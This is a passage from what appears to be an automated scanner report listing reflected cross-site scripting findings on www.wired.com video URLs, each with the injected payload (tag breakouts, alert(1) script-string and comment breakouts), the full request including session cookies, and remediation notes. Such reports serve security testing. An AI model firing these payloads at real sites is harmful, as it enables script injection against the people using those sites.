<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video5ca37"><a>22302db7157 ss_events"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e8d7"><a>6d7a5676676 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/events9e8d7"><a>6d7a5676676 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=292 Expires: Mon, 22 Nov 2010 00:53:33 GMT Date: Mon, 22 Nov 2010 00:48:41 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106671
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_events9e8d7"><a>6d7a5676676"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb819"-alert(1)-"a2a012537a3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/eventseb819"-alert(1)-"a2a012537a3 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:54:51 GMT Date: Mon, 22 Nov 2010 00:49:51 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106712
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49043"><a>f9aca00d89 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video49043"><a>f9aca00d89/gadgets HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29344 Vary: Accept-Encoding Cache-Control: max-age=279 Expires: Mon, 22 Nov 2010 00:52:25 GMT Date: Mon, 22 Nov 2010 00:47:46 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video49043"><a>f9aca00d89 ss_gadgets"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c2f0"-alert(1)-"7cdcaacc317 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/gadgets9c2f0"-alert(1)-"7cdcaacc317 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=295 Expires: Mon, 22 Nov 2010 00:55:09 GMT Date: Mon, 22 Nov 2010 00:50:14 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106669
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e9eb"><a>48a2c0c35be was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/gadgets4e9eb"><a>48a2c0c35be HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:54:14 GMT Date: Mon, 22 Nov 2010 00:49:14 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106680
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_gadgets4e9eb"><a>48a2c0c35be"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c542"><a>37dbceb866c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video8c542"><a>37dbceb866c/gaming HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29397 Vary: Accept-Encoding Cache-Control: max-age=296 Expires: Mon, 22 Nov 2010 00:52:44 GMT Date: Mon, 22 Nov 2010 00:47:48 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video8c542"><a>37dbceb866c ss_gaming"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4bad"><a>b536094fcc3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/gamingf4bad"><a>b536094fcc3 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:54:13 GMT Date: Mon, 22 Nov 2010 00:49:13 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106678
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_gamingf4bad"><a>b536094fcc3"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload de480"-alert(1)-"9db9e95ab77 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/gamingde480"-alert(1)-"9db9e95ab77 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:55:17 GMT Date: Mon, 22 Nov 2010 00:50:17 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106667
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into an HTML comment. The payload cecad--><script>alert(1)</script>d8815df45f9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /videocecad--><script>alert(1)</script>d8815df45f9/harry-potter-and-the-halfblood-prince/14545305001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29462 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:59:02 GMT Date: Mon, 22 Nov 2010 00:54:02 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /videocecad--><script>alert(1)</script>d8815df45f9/harry-potter-and-the-halfblood-prince/14545305001 --> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e1b1"><a>72a1202a501 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video3e1b1"><a>72a1202a501/harry-potter-and-the-halfblood-prince/14545305001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29428 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:58:09 GMT Date: Mon, 22 Nov 2010 00:53:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video3e1b1"><a>72a1202a501 ss_harry-potter-and-the-halfblood-prince c_14545305001"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c34c3"-alert(1)-"ee085e60c1e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/harry-potter-and-the-halfblood-princec34c3"-alert(1)-"ee085e60c1e/14545305001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=271 Expires: Mon, 22 Nov 2010 00:59:42 GMT Date: Mon, 22 Nov 2010 00:55:11 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106757
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84e8e"><a>bee2d49739b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/harry-potter-and-the-halfblood-prince84e8e"><a>bee2d49739b/14545305001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:59:17 GMT Date: Mon, 22 Nov 2010 00:54:17 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106758
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_harry-potter-and-the-halfblood-prince84e8e"><a>bee2d49739b c_14545305001"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa393"-alert(1)-"0c94552f5e1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/harry-potter-and-the-halfblood-prince/14545305001aa393"-alert(1)-"0c94552f5e1 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 01:01:21 GMT Date: Mon, 22 Nov 2010 00:56:21 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106775
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9dbca"><a>251f69d7bf9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/harry-potter-and-the-halfblood-prince/145453050019dbca"><a>251f69d7bf9 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 01:00:12 GMT Date: Mon, 22 Nov 2010 00:55:12 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106758
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_harry-potter-and-the-halfblood-prince c_145453050019dbca"><a>251f69d7bf9"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b00f1"><a>b64741599e3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /videob00f1"><a>b64741599e3/howto HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29338 Vary: Accept-Encoding Cache-Control: max-age=292 Expires: Mon, 22 Nov 2010 00:53:18 GMT Date: Mon, 22 Nov 2010 00:48:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_videob00f1"><a>b64741599e3 ss_howto"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69008"><a>c07367fd69a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/howto69008"><a>c07367fd69a HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=288 Expires: Mon, 22 Nov 2010 00:55:46 GMT Date: Mon, 22 Nov 2010 00:50:58 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106666
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_howto69008"><a>c07367fd69a"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed5a0"-alert(1)-"5b13b736c77 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/howtoed5a0"-alert(1)-"5b13b736c77 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:57:06 GMT Date: Mon, 22 Nov 2010 00:52:06 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106619
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f8e8"><a>35211efdab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
